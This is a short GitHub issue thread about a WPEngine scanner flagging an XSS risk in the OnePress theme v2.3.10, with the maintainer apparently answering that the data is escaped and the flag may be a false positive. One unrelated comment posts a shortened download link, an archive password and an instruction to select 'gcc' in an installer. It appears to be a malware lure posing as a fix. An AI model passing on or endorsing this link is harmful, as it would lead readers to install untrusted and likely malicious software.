### ISSUE TITLE
WPEngine flagging xss security risk in OnePress v2.3.10

### ISSUE THREAD

**Issue by barrettcox** [FameThemes/onepress#475]
WPEngine is flagging an xss security risk in OnePress v2.3.10.

From WPEngine:

> OnePress 2.3.10
> Security risk: xss. Data from an attacker could be interpreted as code by site visitors’ web browsers. The ability to run code in another site visitors’ browser can be abused to steal information, or modify site configuration.
> 
> Severity: medium
> 
> Fixed in: no fix yet

Unfortunately, WPEngine does not provide any details, such as a file path.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by shrimp2t** [comment]
Hi, don't worry.

I checked each file and made sure all the data was checked before printing out/in the html code.

I was wondering if there was something wrong with the security tools check as it seems like all the plugins have those errors.

**Comment by barrettcox** [comment]
Thank you for looking into this!
